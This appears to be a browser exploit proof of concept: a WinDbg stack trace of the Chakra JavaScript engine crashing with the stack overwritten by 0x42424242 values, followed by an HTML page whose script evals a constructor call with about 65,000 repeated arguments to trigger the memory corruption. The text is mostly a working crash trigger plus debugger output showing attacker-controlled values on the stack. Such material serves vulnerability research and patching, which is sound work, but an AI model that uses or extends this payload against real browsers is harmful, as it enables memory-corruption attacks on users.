ntdll!RtlpExecuteHandlerForException+0xd 00007ffe`a1f4910e : 000002aa`8315fbc0 00007ffe`a1ec9f66 000002aa`98205cbb 000000d8`b83f9538 : ntdll!RtlDispatchException+0x368 00007ffe`8133ba8d : 000002aa`8312a270 000002aa`9820003d 000002aa`8312a270 00000000`00000000 : ntdll!KiUserExceptionDispatcher+0x2e 00007ffe`8120a2a5 : 000000d8`b83f9d20 000002aa`98205cbb 000000d8`b83f9c60 000002aa`98205cbb : chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d 00007ffe`810fa321 : 000000d8`b83f9d20 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x10fec5 00007ffe`8102aeac : 000000d8`b83f9d20 000002aa`96ad0000 000000d8`b83f9ea0 000002aa`8312dc00 : chakra!Js::InterpreterStackFrame::Process+0x1b1 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 --> <html> <head> <title> POC </title> </head> <script> var a = '0x42424242,'.repeat(0xFFFF-2); var b = "function Car(){} var car = new Car(a,"+a+"a);"; eval(b); </script> </html>